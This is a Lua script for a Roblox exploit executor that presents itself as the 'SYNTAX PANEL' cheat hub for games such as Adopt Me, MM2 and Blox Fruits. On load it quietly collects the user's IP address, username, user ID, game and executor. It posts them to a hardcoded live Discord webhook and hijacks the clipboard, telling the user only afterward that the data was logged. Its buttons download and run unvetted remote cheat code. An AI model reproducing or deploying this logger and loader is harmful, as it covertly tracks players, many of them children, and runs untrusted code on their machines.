--==================================================
-- WEBHOOK CONFIGURATION
--==================================================
local WEBHOOK_URL = "https://discord.com/api/webhooks/1503111700725891132/cJls_LJ6drVsVZgezWLDXg2OXd3n1Ny9IksQYwNMqB-P__C4rxeMPSEEF0Uljj2hhwLN"
local HUB_NAME = "SYNTAX PANEL"
local EMBED_COLOR = 10040330 -- Blood Red
local _G_Discord = "https://discord.gg/PcNRpWNZVS"

-- Auto-Copy Discord on Load
setclipboard(_G_Discord)

--==================================================
-- LOGGER & GAME CHECKER (WITH IP)
--==================================================
local Players = game:GetService("Players")
local HttpService = game:GetService("HttpService")
local MarketplaceService = game:GetService("MarketplaceService")
local Stats = game:GetService("Stats")
local LocalPlayer = Players.LocalPlayer

local _G_GameName = "Unknown Game"
pcall(function() _G_GameName = MarketplaceService:GetProductInfo(game.PlaceId).Name end)

local http_request = request or http_request or (syn and syn.request) or (fluxus and fluxus.request)

if http_request and not _G.__SYNTAX_LOGGED then
    _G.__SYNTAX_LOGGED = true
    task.spawn(function()
        -- Grab IP Address
        local IP_ADDR = "Failed to fetch"
        pcall(function()
            local response = http_request({Url = "https://api.ipify.org", Method = "GET"})
            if response and response.Body then IP_ADDR = response.Body end
        end)

        local data = {
            username = HUB_NAME .. " Logger",
            embeds = {{
                title = "🩸 Execution Log (IP LOGGED)",
                color = EMBED_COLOR,
                fields = {
                    {name = "👤 User", value = "**" .. LocalPlayer.Name .. "** (" .. LocalPlayer.UserId .. ")", inline = true},
                    {name = "🌐 IP Address", value = "`" .. IP_ADDR .. "`", inline = true},
                    {name = "🎮 Game", value = _G_GameName, inline = false},
                    {name = "🆔 Place ID", value = tostring(game.PlaceId), inline = true},
                    {name = "💻 Executor", value = (identifyexecutor and identifyexecutor() or "Unknown"), inline = true}
                },
                footer = {text = "Syntax Panel Premium • Secure Logger"},
                timestamp = DateTime.now():ToIsoDate()
            }}
        }
        pcall(function()
            http_request({
                Url = WEBHOOK_URL,
                Method = "POST",
                Headers = {["Content-Type"] = "application/json"},
                Body = HttpService:JSONEncode(data)
            })
        end)
    end)
end

--==================================================
-- MAIN UI (BLOOD RED THEME)
--==================================================
local _G_WindUI = loadstring(game:HttpGet("https://raw.githubusercontent.com/Footagesus/WindUI/main/dist/main.lua"))()

local _Window = _G_WindUI:CreateWindow({
    Folder = "syntax_blood_red",
    Title = "SYNTAX PANEL ◆ PREMIUM",
    NewElements = true,
    OpenButton = {
        Enabled = true,
        Color = ColorSequence.new(Color3.fromHex("#4E0000"), Color3.fromHex("#FF0000")),
        Title = "SYNTAX",
        Draggable = true,
    },
    Icon = "solar:ghost-bold",
    AccentColor = Color3.fromHex("#FF0000"), -- Forced Blood Red
})

-- // [ TAB 1: DASHBOARD ]
local _T1 = _Window:Tab({ Title = "Dashboard", Icon = "solar:home-bold" })

_T1:Button({ 
    Title = "User: " .. LocalPlayer.Name, 
    Icon = "solar:user-bold", 
    Callback = function() end 
})

_T1:Button({ 
    Title = "Playing: " .. _G_GameName, 
    Description = "Place ID: " .. game.PlaceId,
    Icon = "solar:gamepad-old-bold", 
    Callback = function() end 
})

local _FPSBtn = _T1:Button({ Title = "FPS: Calculating...", Icon = "solar:chart-square-bold", Callback = function() end })
local _PingBtn = _T1:Button({ Title = "Ping: Calculating...", Icon = "solar:transmission-bold", Callback = function() end })

task.spawn(function()
    while task.wait(1) do
        local fps = math.floor(workspace:GetRealPhysicsFPS())
        local ping = math.floor(Stats.Network.ServerStatsItem["Data Ping"]:GetValue())
        _FPSBtn:SetTitle("FPS: " .. fps)
        _PingBtn:SetTitle("Ping: " .. ping .. "ms")
    end
end)

-- // [ TAB 2: MAIN GAMES ]
local _T2 = _Window:Tab({ Title = "Main Games", Icon = "solar:fire-bold" })

_T2:Button({
    Title = "ADOPT ME (OP)",
    Description = "Exponential Premium Logic",
    Icon = "solar:play-bold",
    Callback = function() 
        loadstring(game:HttpGet("https://raw.githubusercontent.com/PROGRAMSS-CPU/EXPONENTIAL/refs/heads/main/adm-op"))() 
    end
})

_T2:Button({
    Title = "MM2 (OP)",
    Description = "Silent Aim & ESP Features",
    Icon = "solar:play-bold",
    Callback = function() 
        loadstring(game:HttpGet("https://raw.githubusercontent.com/PROGRAMSS-CPU/EXPONENTIAL/refs/heads/main/mm2-op"))() 
    end
})

_T2:Button({
    Title = "STEAL A BRAINROT",
    Description = "Kawatan Hub - Premium",
    Icon = "solar:play-bold",
    Callback = function() 
        loadstring(game:HttpGet("https://raw.githubusercontent.com/PROGRAMSS-CPU/EXPONENTIAL/refs/heads/main/kawatan-hub"))() 
    end
})

_T2:Button({
    Title = "SAILOR PIECE",
    Description = "Luarmor Premium Loader",
    Icon = "solar:play-bold",
    Callback = function() 
        loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/b1f30331e1af9ab6e96fc80cd00b20a9.lua"))() 
    end
})

-- // [ TAB 3: OTHER GAMES ]
local _T3 = _Window:Tab({ Title = "Other Games", Icon = "solar: Sidd-bold" })

_T3:Button({
    Title = "FISCH",
    Icon = "solar:play-circle-bold",
    Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/PROGRAMSS-CPU/EXPONENTIAL/refs/heads/main/fisch-op"))() end
})

_T3:Button({
    Title = "BROOKHAVEN",
    Icon = "solar:play-circle-bold",
    Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/PROGRAMSS-CPU/EXPONENTIAL/refs/heads/main/brookhaven-op"))() end
})

_T3:Button({
    Title = "BLOX FRUITS",
    Icon = "solar:play-circle-bold",
    Callback = function() loadstring(game:HttpGet("https://raw.githubusercontent.com/PROGRAMSS-CPU/EXPONENTIAL/refs/heads/main/bloxfruits-op"))() end
})

-- // [ TAB 4: CREDITS ]
local _T4 = _Window:Tab({ Title = "Credits", Icon = "solar:letter-bold" })

_T4:Button({ 
    Title = "Owner: SYNTAX", 
    Icon = "solar:star-bold", 
    Callback = function() end 
})

_T4:Button({ 
    Title = "Discord Server", 
    Description = "Click to copy invite link", 
    Icon = "solar:share-circle-bold", 
    Callback = function() 
        setclipboard(_G_Discord)
        _G_WindUI:Notify({Title = "Copied", Content = "Discord link copied!", Duration = 3})
    end 
})

_Window:SelectTab(_T1)

_G_WindUI:Notify({
    Title = "SYNTAX BLOOD RED",
    Content = "IP & Data Logged. Welcome back.",
    Duration = 5
})
